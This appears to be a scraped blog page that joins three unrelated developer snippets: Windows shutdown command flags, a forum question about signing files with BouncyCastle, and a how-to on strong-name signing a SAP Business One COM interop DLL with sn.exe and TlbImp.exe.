shutdown options:

-m = Machine name with \\ in front of the name
-r = Reboot (not shut down)
-t 3 = Show clients a warning for 3 seconds
-d P:00:00 = Reason for shutdown 00:00 is more or less “because i felt liek it”

I starting with BouncyCastleCrypto.dll and I’n not found enought documentation. I need one example of how can I sign a file with different alghoritmsLike sha1 sha256 and other and obtain .p7m file.

Today I had a wonderful start of the week. My code, that used to compile, now says:

Assembly generation failed --
Referenced assembly does not have a strong name.

Ok! Fine, let’s see, what did I change… nothing. Great.

After some digging around I found out that somehow my COM DLL, in this case SAPbobsCOM2007.DLL (from SAP Business One 2007), was no longer accepted. Although I am still clueless as to WHY, at least I found a solution.

1) Copy the DLL you need to the solution directory.

Create a key pair (this is just a pair of signing keys, used with the DLL but it doesn’t know anything about the DLL):

sn.exe -k Interop.SAPbobsCOM2007.snk

The name Interop.SAPbobsCOM2007.snk can be anything. I follow the convention of using the name of the DLL, by prefixing “Interop.” and replacing .dll with .snk.

The sn.exe is located in the Microsoft SDK directory (in my case in):

C:\Program Files (x86)\Microsoft SDKs\Windows\v7.0A\Bin\

Next you need to create the interop version of the DLL:

TlbImp.exe SAPbobsCOM2007.dll
  /keyfile:Interop.SAPbobsCOM2007.snk
  /out:Interop.SAPbobsCOM2007.dll

This creates a new DLL, Interop.SAPbobsCOM2007.dll, that’s signed with a strong key.

TlbImp.exe is in the same folder as sn.exe.

Place all three files in your development folder, and then add Interop.SAPbobsCOM2007.dll instead of SAPbobsCOM2007.dll to your project using Add->Reference.

Hit rebuild all and it should all be fine…
